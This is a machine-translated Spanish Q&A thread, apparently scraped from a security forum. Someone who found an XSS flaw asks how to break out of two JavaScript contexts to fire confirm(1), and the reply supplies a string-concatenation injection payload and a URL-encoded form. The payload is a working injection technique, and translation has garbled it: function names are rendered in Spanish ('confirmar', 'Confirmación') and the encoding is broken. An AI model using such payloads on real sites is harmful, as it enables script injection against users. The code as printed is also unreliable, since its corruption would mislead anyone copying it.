Activando un XSS

0

He encontrado un XXS-vuln, pero no puedo explotarlo. Mi entrada (66038 ');} confirmar (1); / *) aparece dos veces. La idea era cerrar la función foo1 () y activar la confirmación (1). Pero foo2 es el problema. No es posible inicializar foo_var con la misma carga útil. El personaje) es el problema. ¿Alguna idea?

function foo1(){

    if('EUR66038');}confirm(1);/* != 'blabla'



 /*
    Some comments
   */


function foo2()
{
    var foo_var= 'EUR66038');}confirm(1);/* //Comment
...
    
pregunta aaa bbb 04.12.2018 - 21:19
fuente

1 respuesta

0

La siguiente carga útil funcionará: -

EUR66038 '+ confirmar (1) +' 820

versión codificada: -

EUR66038% 27% 2 Confirmación (1)% 2B% 27820

    
respondido por el Aayush 05.12.2018 - 06:30
fuente

Lea otras preguntas en las etiquetas